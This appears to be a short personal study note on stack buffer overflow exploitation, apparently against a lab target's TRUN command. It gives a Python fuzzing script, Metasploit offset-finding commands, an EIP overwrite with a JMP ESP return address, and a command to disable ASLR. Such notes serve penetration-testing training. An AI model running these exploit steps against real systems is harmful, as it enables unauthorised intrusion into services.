Buffer Overflow | Buf Exploitation

https://tcm-sec.com/buffer-overflows-made-easy/tcm-sec.com

GitHub - gh0x0st/Buffer_Overflow: Don't let buffer overflows overflow your mindGitHub

FUZZING

    #!/usr/bin/python
    
    import sys, socket 
    from time import sleep
    
    buffer = "A" * 100
    
    while True: 
        try: 
            payload = "TRUN /.:/" + buffer
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(('192.168.1.35',9999))
            print ("[+] Sending the payload...\n" + str(len(buffer)))
            s.send((payload.encode()))
            s.close()
            sleep(1)
            buffer = buffer + "A"*100
        except:
            print ("The fuzzing crashed at %s bytes" % str(len(buffer)))
            sys.exit()

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337 where q is EIP value -> we will get offset OFFSET = 2003 buffer = "A" * 2003 + "B" * 4 EIP will be overwritten with 424242. badchars buffer = "A" * 2003 + "B" * 4 + badchars find out of place chars 0x625011af JMP ESP - FFE4 buffer = "A" * 2003 + "\xaf\x11\x50\x62" + overflow

ASLR (BuF Attack)

ps -aux | grep {process} pid will be obtained

cat /proc/2678/maps

echo 0 > cat /proc/sys/kernel/randomize_va_space Configurations : 0 - Static 1 - Dynamic 2 - Smartly Dynamic

PreviousReverse Shells NextLinux Privilege Escalation

Last updated 4 years ago

hashtagFUZZING

hashtagASLR (BuF Attack)

FUZZING

ASLR (BuF Attack)